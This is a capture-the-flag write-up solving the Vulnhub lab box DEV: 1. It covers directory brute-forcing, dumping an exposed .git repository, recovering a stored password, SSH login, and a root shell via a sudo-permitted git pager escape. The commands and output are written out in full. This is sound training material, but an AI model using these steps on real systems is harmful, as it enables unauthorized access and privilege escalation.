Vulnhub - DEV: 1 | An ordinary day

Introduction

Easy level Linux box.
This box “dev” aims to educate people on common and misconfigurations of a widely used developer tool.
Use a good wordlist!

This is DEV: 1 from vulnhub.

Ports

We have two ports only, SSH and HTTP on the standard port 80.

HTTP

We’ve got a hint that we’re looking for a development tool and we need a decent wordlist. I run gobuster with a big list:

root@kali:/opt/vulnhub/dev# gobuster dir -u http://192.168.1.137 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

And it turns up a /wwwdev directory. Within that is our target, .git.

GIT

I use git sometimes so I am somewhat familiar with it; however I saw IPPSEC use a nice tool called git-dumper which I have never used before. I decided to give it a try. I clone the repo into /opt/git-dumper and run:

root@kali:/opt/vulnhub/dev# /opt/gitdumper/git-dumper.py http://192.168.1.137/wwwdev/ repo

It works perfectly. Checking git log we see:

root@kali:/opt/vulnhub/dev/repo# git log
commit 8072e242fdc09129cac94c569f6cc5ee0aef8059 (HEAD -> main, origin/main)
Author: User f3dai@dev.local
Date: Mon Oct 12 23:44:09 2020 +0100
updated: removed file
commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Author: User f3dai@dev.local
Date: Mon Oct 12 23:43:00 2020 +0100
First commit :)

So we only have two commits, and the second one removed a file. Let’s check the first one:

root@kali:/opt/vulnhub/dev/repo# git checkout f9e2a3675f4b2f2196276fd11cac9d210a2fc737

Once we’ve done that we have a file called cred with the contents:

D1yceX0jgixhk (slime)

This is a vignere cipher encoded password with the key slime; it decodes to:

L1nusT0rvalds

With this, we can SSH in as f3dai (our git user from above).

Privsec

Once we’re in as f3dai, we find out he can run git as root with sudo, which is a nice touch. GTFOBins shows how we can take advantage of that:

f3dai@dev:~$ sudo -l
Matching Defaults entries for f3dai on dev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User f3dai may run the following commands on dev:
    (root) NOPASSWD: /usr/bin/git
	
f3dai@dev:~$ sudo -u root /usr/bin/git -p help config
// then
!/bin/sh
# cd /root
# ls
root.txt
# cat root.txt
37c24213df088bb485e97b7ce1929e09

This wasn’t overly complicated and didn’t take too long but I enjoyed it; thanks f3da1.

A parting note

I also completed Praying: 1 from Vulnhub but I’m not going to write it up as a separate entry. Foothold was via a PHP webapp called Mantis with an unauthenticated RCE vulnerability, then we escalated through three users by finding their credentials, and then privesc was the same as Funbox next level with dd.